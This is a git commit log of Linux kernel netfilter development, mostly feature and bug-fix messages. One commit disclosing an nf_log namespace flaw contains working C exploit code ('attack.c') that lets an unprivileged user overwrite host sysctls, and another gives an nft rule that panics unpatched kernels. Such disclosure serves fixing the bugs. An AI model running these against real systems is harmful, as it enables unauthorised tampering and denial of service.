redonkable/remarkable-linux

Author	SHA1	Message	Date
David S. Miller	4cb551a100	Merge git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nf-next Pablo Neira Ayuso says: ==================== Netfilter updates for net-next The following patchset contains Netfilter updates for your net-next tree. This includes better integration with the routing subsystem for nf_tables, explicit notrack support and smaller updates. More specifically, they are: 1) Add fib lookup expression for nf_tables, from Florian Westphal. This new expression provides a native replacement for iptables addrtype and rp_filter matches. This is more flexible though, since we can populate the kernel flowi representation to inquire fib to accomodate new usecases, such as RTBH through skb mark. 2) Introduce rt expression for nf_tables, from Anders K. Pedersen. This new expression allow you to access skbuff route metadata, more specifically nexthop and classid fields. 3) Add notrack support for nf_tables, to skip conntracking, requested by many users already. 4) Add boilerplate code to allow to use nf_log infrastructure from nf_tables ingress. 5) Allow to mangle pkttype from nf_tables prerouting chain, to emulate the xtables cluster match, from Liping Zhang. 6) Move socket lookup code into generic nf_socket_* infrastructure so we can provide a native replacement for the xtables socket match. 7) Make sure nfnetlink_queue data that is updated on every packets is placed in a different cache from read-only data, from Florian Westphal. 8) Handle NF_STOLEN from nf_tables core, also from Florian Westphal. 9) Start round robin number generation in nft_numgen from zero, instead of n-1, for consistency with xtables statistics match, patch from Liping Zhang. 10) Set GFP_NOWARN flag in skbuff netlink allocations in nfnetlink_log, given we retry with a smaller allocation on failure, from Calvin Owens. 11) Cleanup xt_multiport to use switch(), from Gao feng. 12) Remove superfluous check in nft_immediate and nft_cmp, from Liping Zhang. ==================== Signed-off-by: David S. Miller <davem@davemloft.net>	2016-11-02 14:57:47 -04:00
Florian Westphal	886bc50348	netfilter: nf_queue: place volatile data in own cacheline As the comment indicates, the data at the end of nfqnl_instance struct is written on every queue/dequeue, so it should reside in its own cacheline. Before this change, 'lock' was in first cacheline so we dirtied both. Signed-off-by: Florian Westphal <fw@strlen.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-11-01 20:50:33 +01:00
Liping Zhang	e41e9d623c	netfilter: nf_tables: remove useless U8_MAX validation After call nft_data_init, size is already validated and desc.len will not exceed the sizeof(struct nft_data), i.e. 16 bytes. So it will never exceed U8_MAX. Furthermore, in nft_immediate_init, we forget to call nft_data_uninit when desc.len exceeds U8_MAX, although this will not happen, but it's a logical mistake. Now remove these redundant validation introduced by commit `36b701fae1` ("netfilter: nf_tables: validate maximum value of u32 netlink attributes") Signed-off-by: Liping Zhang <zlpnobody@gmail.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-11-01 20:50:32 +01:00
Anders K. Pedersen	2fa841938c	netfilter: nf_tables: introduce routing expression Introduces an nftables rt expression for routing related data with support for nexthop (i.e. the directly connected IP address that an outgoing packet is sent to), which can be used either for matching or accounting, eg. # nft add rule filter postrouting \ ip daddr 192.168.1.0/24 rt nexthop != 192.168.0.1 drop This will drop any traffic to 192.168.1.0/24 that is not routed via 192.168.0.1. # nft add rule filter postrouting \ flow table acct { rt nexthop timeout 600s counter } # nft add rule ip6 filter postrouting \ flow table acct { rt nexthop timeout 600s counter } These rules count outgoing traffic per nexthop. Note that the timeout releases an entry if no traffic is seen for this nexthop within 10 minutes. # nft add rule inet filter postrouting \ ether type ip \ flow table acct { rt nexthop timeout 600s counter } # nft add rule inet filter postrouting \ ether type ip6 \ flow table acct { rt nexthop timeout 600s counter } Same as above, but via the inet family, where the ether type must be specified explicitly. "rt classid" is also implemented identical to "meta rtclassid", since it is more logical to have this match in the routing expression going forward. Signed-off-by: Anders K. Pedersen <akp@cohaesio.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-11-01 20:50:31 +01:00
Pablo Neira Ayuso	8db4c5be88	netfilter: move socket lookup infrastructure to nf_socket_ipv{4,6}.c We need this split to reuse existing codebase for the upcoming nf_tables socket expression. Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-11-01 20:50:31 +01:00
Pablo Neira Ayuso	1fddf4bad0	netfilter: nf_log: add packet logging for netdev family Move layer 2 packet logging into nf_log_l2packet() that resides in nf_log_common.c, so this can be shared by both bridge and netdev families. This patch adds the boiler plate code to register the netdev logging family. Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-11-01 20:50:30 +01:00
Florian Westphal	f6d0cbcf09	netfilter: nf_tables: add fib expression Add FIB expression, supported for ipv4, ipv6 and inet family (the latter just dispatches to ipv4 or ipv6 one based on nfproto). Currently supports fetching output interface index/name and the rtm_type associated with an address. This can be used for adding path filtering. rtm_type is useful to e.g. enforce a strong-end host model where packets are only accepted if daddr is configured on the interface the packet arrived on. The fib expression is a native nftables alternative to the xtables addrtype and rp_filter matches. FIB result order for oif/oifname retrieval is as follows: - if packet is local (skb has rtable, RTF_LOCAL set, this will also catch looped-back multicast packets), set oif to the loopback interface. - if fib lookup returns an error, or result points to local, store zero result. This means '--local' option of -m rpfilter is not supported. It is possible to use 'fib type local' or add explicit saddr/daddr matching rules to create exceptions if this is really needed. - store result in the destination register. In case of multiple routes, search set for desired oif in case strict matching is requested. ipv4 and ipv6 behave fib expressions are supposed to behave the same. [ I have collapsed Arnd Bergmann's ("netfilter: nf_tables: fib warnings") http://patchwork.ozlabs.org/patch/688615/ to address fallout from this patch after rebasing nf-next, that was posted to address compilation warnings. --pablo ] Signed-off-by: Florian Westphal <fw@strlen.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-11-01 20:50:14 +01:00
David S. Miller	27058af401	Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net Mostly simple overlapping changes. For example, David Ahern's adjacency list revamp in 'net-next' conflicted with an adjacency list traversal bug fix in 'net'. Signed-off-by: David S. Miller <davem@davemloft.net>	2016-10-30 12:42:58 -04:00
Johannes Berg	56989f6d85	genetlink: mark families as __ro_after_init Now genl_register_family() is the only thing (other than the users themselves, perhaps, but I didn't find any doing that) writing to the family struct. In all families that I found, genl_register_family() is only called from __init functions (some indirectly, in which case I've add __init annotations to clarifly things), so all can actually be marked __ro_after_init. This protects the data structure from accidental corruption. Signed-off-by: Johannes Berg <johannes.berg@intel.com> Signed-off-by: David S. Miller <davem@davemloft.net>	2016-10-27 16:16:09 -04:00
Johannes Berg	489111e5c2	genetlink: statically initialize families Instead of providing macros/inline functions to initialize the families, make all users initialize them statically and get rid of the macros. This reduces the kernel code size by about 1.6k on x86-64 (with allyesconfig). Signed-off-by: Johannes Berg <johannes.berg@intel.com> Signed-off-by: David S. Miller <davem@davemloft.net>	2016-10-27 16:16:09 -04:00
Johannes Berg	a07ea4d994	genetlink: no longer support using static family IDs Static family IDs have never really been used, the only use case was the workaround I introduced for those users that assumed their family ID was also their multicast group ID. Additionally, because static family IDs would never be reserved by the generic netlink code, using a relatively low ID would only work for built-in families that can be registered immediately after generic netlink is started, which is basically only the control family (apart from the workaround code, which I also had to add code for so it would reserve those IDs) Thus, anything other than GENL_ID_GENERATE is flawed and luckily not used except in the cases I mentioned. Move those workarounds into a few lines of code, and then get rid of GENL_ID_GENERATE entirely, making it more robust. Signed-off-by: Johannes Berg <johannes.berg@intel.com> Signed-off-by: David S. Miller <davem@davemloft.net>	2016-10-27 16:16:09 -04:00
Pablo Neira Ayuso	254432613c	netfilter: nft_ct: add notrack support This patch adds notrack support. I decided to add a new expression, given that this doesn't fit into the existing set operation. Notrack doesn't need a source register, and an hypothetical NFT_CT_NOTRACK key makes no sense since matching the untracked state is done through NFT_CT_STATE. I'm placing this new notrack expression into nft_ct.c, I think a single module is too much. Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-26 16:35:16 +02:00
Liping Zhang	96d9f2a72c	netfilter: nft_meta: permit pkttype mangling in ip/ip6 prerouting After supporting this, we can combine it with hash expression to emulate the 'cluster match'. Suggested-by: Pablo Neira Ayuso <pablo@netfilter.org> Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-26 16:35:16 +02:00
Liping Zhang	0ecba4d9d1	netfilter: nft_numgen: start round robin from zero Currently we start round robin from 1, but it's better to start round robin from 0. This is to keep consistent with xt_statistic in iptables. Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-26 16:35:16 +02:00
Florian Westphal	5efa0fc6d7	netfilter: nf_tables: allow expressions to return STOLEN Currently not supported, we'd oops as skb was (or is) free'd elsewhere. Signed-off-by: Florian Westphal <fw@strlen.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-26 16:35:15 +02:00
Calvin Owens	0813fbc913	netfilter: nfnetlink_log: Use GFP_NOWARN for skb allocation Since the code explicilty falls back to a smaller allocation when the large one fails, we shouldn't complain when that happens. Signed-off-by: Calvin Owens <calvinowens@fb.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-26 16:35:15 +02:00
Gao Feng	dd2602d00f	netfilter: xt_multiport: Use switch case instead of multiple condition checks There are multiple equality condition checks in the original codes, so it is better to use switch case instead of them. Signed-off-by: Gao Feng <fgao@ikuai8.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-26 16:35:15 +02:00
Pablo Neira Ayuso	7034b566a4	netfilter: fix nf_queue handling nf_queue handling is broken since `e3b37f11e6` ("netfilter: replace list_head with single linked list") for two reasons: 1) If the bypass flag is set on, there are no userspace listeners and we still have more hook entries to iterate over, then jump to the next hook. Otherwise accept the packet. On nf_reinject() path, the okfn() needs to be invoked. 2) We should not re-enter the same hook on packet reinjection. If the packet is accepted, we have to skip the current hook from where the packet was enqueued, otherwise the packets gets enqueued over and over again. This restores the previous list_for_each_entry_continue() behaviour happening from nf_iterate() that was dealing with these two cases. This patch introduces a new nf_queue() wrapper function so this fix becomes simpler. Fixes: `e3b37f11e6` ("netfilter: replace list_head with single linked list") Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-20 19:59:59 +02:00
Nicolas Dichtel	7bb6615d39	netfilter: conntrack: restart gc immediately if GC_MAX_EVICTS is reached When the maximum evictions number is reached, do not wait 5 seconds before the next run. CC: Florian Westphal <fw@strlen.de> Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com> Acked-by: Florian Westphal <fw@strlen.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-20 19:59:53 +02:00
Florian Westphal	1ecc281ec2	netfilter: x_tables: suppress kmemcheck warning Markus Trippelsdorf reports: WARNING: kmemcheck: Caught 64-bit read from uninitialized memory (ffff88001e605480) 4055601e0088ffff000000000000000090686d81ffffffff0000000000000000 u u u u u u u u u u u u u u u u i i i i i i i i u u u u u u u u ^ \|RIP: 0010:[<ffffffff8166e561>] [<ffffffff8166e561>] nf_register_net_hook+0x51/0x160 [..] [<ffffffff8166e561>] nf_register_net_hook+0x51/0x160 [<ffffffff8166eaaf>] nf_register_net_hooks+0x3f/0xa0 [<ffffffff816d6715>] ipt_register_table+0xe5/0x110 [..] This warning is harmless; we copy 'uninitialized' data from the hook ops but it will not be used. Long term the structures keeping run-time data should be disentangled from those only containing config-time data (such as where in the list to insert a hook), but thats -next material. Reported-by: Markus Trippelsdorf <markus@trippelsdorf.de> Suggested-by: Al Viro <viro@ZenIV.linux.org.uk> Signed-off-by: Florian Westphal <fw@strlen.de> Acked-by: Aaron Conole <aconole@bytheb.org> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-19 18:32:24 +02:00
Arnd Bergmann	d2e4d59351	netfilter: nf_tables: avoid uninitialized variable warning The newly added nft_range_eval() function handles the two possible nft range operations, but as the compiler warning points out, any unexpected value would lead to the 'mismatch' variable being used without being initialized: net/netfilter/nft_range.c: In function 'nft_range_eval': net/netfilter/nft_range.c:45:5: error: 'mismatch' may be used uninitialized in this function [-Werror=maybe-uninitialized] This removes the variable in question and instead moves the condition into the switch itself, which is potentially more efficient than adding a bogus 'default' clause as in my first approach, and is nicer than using the 'uninitialized_var' macro. Fixes: `0f3cd9b369` ("netfilter: nf_tables: add range expression") Link: http://patchwork.ozlabs.org/patch/677114/ Signed-off-by: Arnd Bergmann <arnd@arndb.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-18 17:35:10 +02:00
Pablo Neira Ayuso	ccca6607c5	netfilter: nft_range: validate operation netlink attribute Use nft_parse_u32_check() to make sure we don't get a value over the unsigned 8-bit integer. Moreover, make sure this value doesn't go over the two supported range comparison modes. Fixes: 9286c2eb1fda ("netfilter: nft_range: validate operation netlink attribute") Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-17 18:57:02 +02:00
Dan Carpenter	21a9e0f156	netfilter: nft_exthdr: fix error handling in nft_exthdr_init() "err" needs to be signed for the error handling to work. Fixes: `36b701fae1` ('netfilter: nf_tables: validate maximum value of u32 netlink attributes') Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-17 17:43:54 +02:00
Dan Carpenter	09525a09ad	netfilter: nf_tables: underflow in nft_parse_u32_check() We don't want to allow negatives here. Fixes: `36b701fae1` ('netfilter: nf_tables: validate maximum value of u32 netlink attributes') Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-17 17:43:53 +02:00
Liping Zhang	5751e175c6	netfilter: nft_hash: add missing NFTA_HASH_OFFSET's nla_policy Missing the nla_policy description will also miss the validation check in kernel. Fixes: `70ca767ea1` ("netfilter: nft_hash: Add hash offset value") Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-17 17:43:53 +02:00
Liping Zhang	f434ed0a00	netfilter: xt_ipcomp: add "ip[6]t_ipcomp" module alias name Otherwise, user cannot add related rules if xt_ipcomp.ko is not loaded: # iptables -A OUTPUT -p 108 -m ipcomp --ipcompspi 1 iptables: No chain/target/match by that name. Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-17 17:38:19 +02:00
Liping Zhang	6d19375b58	netfilter: xt_NFLOG: fix unexpected truncated packet Justin and Chris spotted that iptables NFLOG target was broken when they upgraded the kernel to 4.8: "ulogd-2.0.5- IPs are no longer logged" or "results in segfaults in ulogd-2.0.5". Because "struct nf_loginfo li;" is a local variable, and flags will be filled with garbage value, not inited to zero. So if it contains 0x1, packets will not be logged to the userspace anymore. Fixes: `7643507fe8` ("netfilter: xt_NFLOG: nflog-range does not truncate packets") Reported-by: Justin Piszcz <jpiszcz@lucidpixels.com> Reported-by: Chris Caputo <ccaputo@alt.net> Tested-by: Chris Caputo <ccaputo@alt.net> Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-17 17:38:19 +02:00
Anders K. Pedersen	a8b1e36d0d	netfilter: nft_dynset: fix element timeout for HZ != 1000 With HZ=100 element timeout in dynamic sets (i.e. flow tables) is 10 times higher than configured. Add proper conversion to/from jiffies, when interacting with userspace. I tested this on Linux 4.8.1, and it applies cleanly to current nf and nf-next trees. Fixes: `22fe54d5fe` ("netfilter: nf_tables: add support for dynamic set updates") Signed-off-by: Anders K. Pedersen <akp@cohaesio.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-17 17:29:39 +02:00
Geert Uytterhoeven	1b203c138c	netfilter: xt_hashlimit: Add missing ULL suffixes for 64-bit constants On 32-bit (e.g. with m68k-linux-gnu-gcc-4.1): net/netfilter/xt_hashlimit.c: In function ‘user2credits’: net/netfilter/xt_hashlimit.c:476: warning: integer constant is too large for ‘long’ type ... net/netfilter/xt_hashlimit.c:478: warning: integer constant is too large for ‘long’ type ... net/netfilter/xt_hashlimit.c:480: warning: integer constant is too large for ‘long’ type ... net/netfilter/xt_hashlimit.c: In function ‘rateinfo_recalc’: net/netfilter/xt_hashlimit.c:513: warning: integer constant is too large for ‘long’ type Fixes: `11d5f15723` ("netfilter: xt_hashlimit: Create revision 2 to support higher pps rates") Signed-off-by: Geert Uytterhoeven <geert@linux-m68k.org> Acked-by: Vishwanath Pai <vpai@akamai.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-17 17:25:23 +02:00
Linus Torvalds	bd3769bfed	netfilter: Fix slab corruption. Use the correct pattern for singly linked list insertion and deletion. We can also calculate the list head outside of the mutex. Fixes: `e3b37f11e6` ("netfilter: replace list_head with single linked list") Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Reviewed-by: Aaron Conole <aconole@bytheb.org> Signed-off-by: David S. Miller <davem@davemloft.net> net/netfilter/core.c \| 108 ++++++++++++++++----------------------------------- 1 file changed, 33 insertions(+), 75 deletions(-)	2016-10-11 04:44:37 -04:00
Liping Zhang	2fa46c1301	netfilter: nft_limit: fix divided by zero panic After I input the following nftables rule, a panic happened on my system: # nft add rule filter OUTPUT limit rate 0xf00000000 bytes/second divide error: 0000 [#1] SMP [ ... ] RIP: 0010:[<ffffffffa059035e>] [<ffffffffa059035e>] nft_limit_pkt_bytes_eval+0x2e/0xa0 [nft_limit] Call Trace: [<ffffffffa05721bb>] nft_do_chain+0xfb/0x4e0 [nf_tables] [<ffffffffa044f236>] ? nf_nat_setup_info+0x96/0x480 [nf_nat] [<ffffffff81753767>] ? ipt_do_table+0x327/0x610 [<ffffffffa044f677>] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat] [<ffffffffa058b21f>] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4] [<ffffffff816f4aa2>] nf_iterate+0x62/0x80 [<ffffffff816f4b33>] nf_hook_slow+0x73/0xd0 [<ffffffff81703d0d>] __ip_local_out+0xcd/0xe0 [<ffffffff81701d90>] ? ip_forward_options+0x1b0/0x1b0 [<ffffffff81703d3c>] ip_local_out+0x1c/0x40 This is because divisor is 64-bit, but we treat it as a 32-bit integer, then 0xf00000000 becomes zero, i.e. divisor becomes 0. Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-04 08:59:03 +02:00
Jann Horn	dbb5918cb3	netfilter: fix namespace handling in nf_log_proc_dostring nf_log_proc_dostring() used current's network namespace instead of the one corresponding to the sysctl file the write was performed on. Because the permission check happens at open time and the nf_log files in namespaces are accessible for the namespace owner, this can be abused by an unprivileged user to effectively write to the init namespace's nf_log sysctls. Stash the "struct net " in extra2 - data and extra1 are already used. Repro code: #define _GNU_SOURCE #include <stdlib.h> #include <sched.h> #include <err.h> #include <sys/mount.h> #include <sys/types.h> #include <sys/wait.h> #include <fcntl.h> #include <unistd.h> #include <string.h> #include <stdio.h> char child_stack[1000000]; uid_t outer_uid; gid_t outer_gid; int stolen_fd = -1; void writefile(char path, char buf) { int fd = open(path, O_WRONLY); if (fd == -1) err(1, "unable to open thing"); if (write(fd, buf, strlen(buf)) != strlen(buf)) err(1, "unable to write thing"); close(fd); } int child_fn(void p_) { if (mount("proc", "/proc", "proc", MS_NOSUID\|MS_NODEV\|MS_NOEXEC, NULL)) err(1, "mount"); /* Yes, we need to set the maps for the net sysctls to recognize us * as namespace root. / char buf[1000]; sprintf(buf, "0 %d 1\n", (int)outer_uid); writefile("/proc/1/uid_map", buf); writefile("/proc/1/setgroups", "deny"); sprintf(buf, "0 %d 1\n", (int)outer_gid); writefile("/proc/1/gid_map", buf); stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY); if (stolen_fd == -1) err(1, "open nf_log"); return 0; } int main(void) { outer_uid = getuid(); outer_gid = getgid(); int child = clone(child_fn, child_stack + sizeof(child_stack), CLONE_FILES\|CLONE_NEWNET\|CLONE_NEWNS\|CLONE_NEWPID \|CLONE_NEWUSER\|CLONE_VM\|SIGCHLD, NULL); if (child == -1) err(1, "clone"); int status; if (wait(&status) != child) err(1, "wait"); if (!WIFEXITED(status) \|\| WEXITSTATUS(status) != 0) errx(1, "child exit status bad"); char data = "NONE"; if (write(stolen_fd, data, strlen(data)) != strlen(data)) err(1, "write"); return 0; } Repro: $ gcc -Wall -o attack attack.c -std=gnu99 $ cat /proc/sys/net/netfilter/nf_log/2 nf_log_ipv4 $ ./attack $ cat /proc/sys/net/netfilter/nf_log/2 NONE Because this looks like an issue with very low severity, I'm sending it to the public list directly. Signed-off-by: Jann Horn <jann@thejh.net> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-10-04 08:41:06 +02:00
Vishwanath Pai	1f827f5138	netfilter: xt_hashlimit: Fix link error in 32bit arch because of 64bit division Division of 64bit integers will cause linker error undefined reference to `__udivdi3'. Fix this by replacing divisions with div64_64 Fixes: `11d5f15723` ("netfilter: xt_hashlimit: Create revision 2 to ...") Signed-off-by: Vishwanath Pai <vpai@akamai.com> Acked-by: Maciej Żenczykowski <maze@google.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-30 20:15:27 +02:00
Aaron Conole	7816ec564e	netfilter: accommodate different kconfig in nf_set_hooks_head When CONFIG_NETFILTER_INGRESS is unset (or no), we need to handle the request for registration properly by dropping the hook. This releases the entry during the set. Fixes: `e3b37f11e6` ("netfilter: replace list_head with single linked list") Signed-off-by: Aaron Conole <aconole@bytheb.org> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-30 20:15:26 +02:00
Aaron Conole	5119e4381a	netfilter: Fix potential null pointer dereference It's possible for nf_hook_entry_head to return NULL. If two nf_unregister_net_hook calls happen simultaneously with a single hook entry in the list, both will enter the nf_hook_mutex critical section. The first will successfully delete the head, but the second will see this NULL pointer and attempt to dereference. This fix ensures that no null pointer dereference could occur when such a condition happens. Fixes: `e3b37f11e6` ("netfilter: replace list_head with single linked list") Signed-off-by: Aaron Conole <aconole@bytheb.org> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-30 20:15:26 +02:00
Pablo Neira Ayuso	f20fbc0717	Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next Conflicts: net/netfilter/core.c net/netfilter/nf_tables_netdev.c Resolve two conflicts before pull request for David's net-next tree: 1) Between `c73c248490` ("netfilter: nf_tables_netdev: remove redundant ip_hdr assignment") from the net tree and commit `ddc8b6027a` ("netfilter: introduce nft_set_pktinfo_{ipv4, ipv6}_validate()"). 2) Between `e8bffe0cf9` ("net: Add _nf_(un)register_hooks symbols") and Aaron Conole's patches to replace list_head with single linked list. Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 23:34:19 +02:00
Liping Zhang	8cb2a7d566	netfilter: nf_log: get rid of XT_LOG_* macros nf_log is used by both nftables and iptables, so use XT_LOG_XXX macros here is not appropriate. Replace them with NF_LOG_XXX. Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 23:16:45 +02:00
Liping Zhang	ff107d2776	netfilter: nft_log: complete NFTA_LOG_FLAGS attr support NFTA_LOG_FLAGS attribute is already supported, but the related NF_LOG_XXX flags are not exposed to the userspace. So we cannot explicitly enable log flags to log uid, tcp sequence, ip options and so on, i.e. such rule "nft add rule filter output log uid" is not supported yet. So move NF_LOG_XXX macro definitions to the uapi/../nf_log.h. In order to keep consistent with other modules, change NF_LOG_MASK to refer to all supported log flags. On the other hand, add a new NF_LOG_DEFAULT_MASK to refer to the original default log flags. Finally, if user specify the unsupported log flags or NFTA_LOG_GROUP and NFTA_LOG_FLAGS are set at the same time, report EINVAL to the userspace. Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 23:16:43 +02:00
Pablo Neira Ayuso	0f3cd9b369	netfilter: nf_tables: add range expression Inverse ranges != [a,b] are not currently possible because rules are composites of && operations, and we need to express this: data < a \|\| data > b This patch adds a new range expression. Positive ranges can be already through two cmp expressions: cmp(sreg, data, >=) cmp(sreg, data, <=) This new range expression provides an alternative way to express this. Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 23:16:42 +02:00
Florian Westphal	58e207e498	netfilter: evict stale entries when user reads /proc/net/nf_conntrack Fabian reports a possible conntrack memory leak (could not reproduce so far), however, one minor issue can be easily resolved: > cat /proc/net/nf_conntrack \| wc -l = 5 > 4 minutes required to clean up the table. We should not report those timed-out entries to the user in first place. And instead of just skipping those timed-out entries while iterating over the table we can also zap them (we already do this during ctnetlink walks, but I forgot about the /proc interface). Fixes: `f330a7fdbe` ("netfilter: conntrack: get rid of conntrack timer") Reported-by: Fabian Frederick <fabf@skynet.be> Signed-off-by: Florian Westphal <fw@strlen.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 14:54:08 +02:00
Vishwanath Pai	11d5f15723	netfilter: xt_hashlimit: Create revision 2 to support higher pps rates Create a new revision for the hashlimit iptables extension module. Rev 2 will support higher pps of upto 1 million, Version 1 supports only 10k. To support this we have to increase the size of the variables avg and burst in hashlimit_cfg to 64-bit. Create two new structs hashlimit_cfg2 and xt_hashlimit_mtinfo2 and also create newer versions of all the functions for match, checkentry and destroy. Some of the functions like hashlimit_mt, hashlimit_mt_check etc are very similar in both rev1 and rev2 with only minor changes, so I have split those functions and moved all the common code to a *_common function. Signed-off-by: Vishwanath Pai <vpai@akamai.com> Signed-off-by: Joshua Hunt <johunt@akamai.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 14:54:06 +02:00
Vishwanath Pai	0dc60a4546	netfilter: xt_hashlimit: Prepare for revision 2 I am planning to add a revision 2 for the hashlimit xtables module to support higher packets per second rates. This patch renames all the functions and variables related to revision 1 by adding _v1 at the end of the names. Signed-off-by: Vishwanath Pai <vpai@akamai.com> Signed-off-by: Joshua Hunt <johunt@akamai.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 14:54:05 +02:00
Liping Zhang	7bfdde7045	netfilter: nft_ct: report error if mark and dir specified simultaneously NFT_CT_MARK is unrelated to direction, so if NFTA_CT_DIRECTION attr is specified, report EINVAL to the userspace. This validation check was already done at nft_ct_get_init, but we missed it in nft_ct_set_init. Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 14:54:04 +02:00
Liping Zhang	d767ff2c84	netfilter: nft_ct: unnecessary to require dir when use ct l3proto/protocol Currently, if the user want to match ct l3proto, we must specify the direction, for example: # nft add rule filter input ct original l3proto ipv4 ^^^^^^^^ Otherwise, error message will be reported: # nft add rule filter input ct l3proto ipv4 nft add rule filter input ct l3proto ipv4 <cmdline>:1:1-38: Error: Could not process rule: Invalid argument add rule filter input ct l3proto ipv4 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Actually, there's no need to require NFTA_CT_DIRECTION attr, because ct l3proto and protocol are unrelated to direction. And for compatibility, even if the user specify the NFTA_CT_DIRECTION attr, do not report error, just skip it. Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 14:54:02 +02:00
Gao Feng	8d11350f5f	netfilter: seqadj: Fix the wrong ack adjust for the RST packet without ack It is valid that the TCP RST packet which does not set ack flag, and bytes of ack number are zero. But current seqadj codes would adjust the "0" ack to invalid ack number. Actually seqadj need to check the ack flag before adjust it for these RST packets. The following is my test case client is 10.26.98.245, and add one iptable rule: iptables -I INPUT -p tcp --sport 12345 -m connbytes --connbytes 2: --connbytes-dir reply --connbytes-mode packets -j REJECT --reject-with tcp-reset This iptables rule could generate on TCP RST without ack flag. server:10.172.135.55 Enable the synproxy with seqadjust by the following iptables rules iptables -t raw -A PREROUTING -i eth0 -p tcp -d 10.172.135.55 --dport 12345 -m tcp --syn -j CT --notrack iptables -A INPUT -i eth0 -p tcp -d 10.172.135.55 --dport 12345 -m conntrack --ctstate INVALID,UNTRACKED -j SYNPROXY --sack-perm --timestamp --wscale 7 --mss 1460 iptables -A OUTPUT -o eth0 -p tcp -s 10.172.135.55 --sport 12345 -m conntrack --ctstate INVALID,UNTRACKED -m tcp --tcp-flags SYN,RST,ACK SYN,ACK -j ACCEPT The following is my test result. 1. packet trace on client root@routers:/tmp# tcpdump -i eth0 tcp port 12345 -n tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes IP 10.26.98.245.45154 > 10.172.135.55.12345: Flags [S], seq 3695959829, win 29200, options [mss 1460,sackOK,TS val 452367884 ecr 0,nop,wscale 7], length 0 IP 10.172.135.55.12345 > 10.26.98.245.45154: Flags [S.], seq 546723266, ack 3695959830, win 0, options [mss 1460,sackOK,TS val 15643479 ecr 452367884, nop,wscale 7], length 0 IP 10.26.98.245.45154 > 10.172.135.55.12345: Flags [.], ack 1, win 229, options [nop,nop,TS val 452367885 ecr 15643479], length 0 IP 10.172.135.55.12345 > 10.26.98.245.45154: Flags [.], ack 1, win 226, options [nop,nop,TS val 15643479 ecr 452367885], length 0 IP 10.26.98.245.45154 > 10.172.135.55.12345: Flags [R], seq 3695959830, win 0, length 0 2. seqadj log on server [62873.867319] Adjusting sequence number from 602341895->546723267, ack from 3695959830->3695959830 [62873.867644] Adjusting sequence number from 602341895->546723267, ack from 3695959830->3695959830 [62873.869040] Adjusting sequence number from 3695959830->3695959830, ack from 0->55618628 To summarize, it is clear that the seqadj codes adjust the 0 ack when receive one TCP RST packet without ack. Signed-off-by: Gao Feng 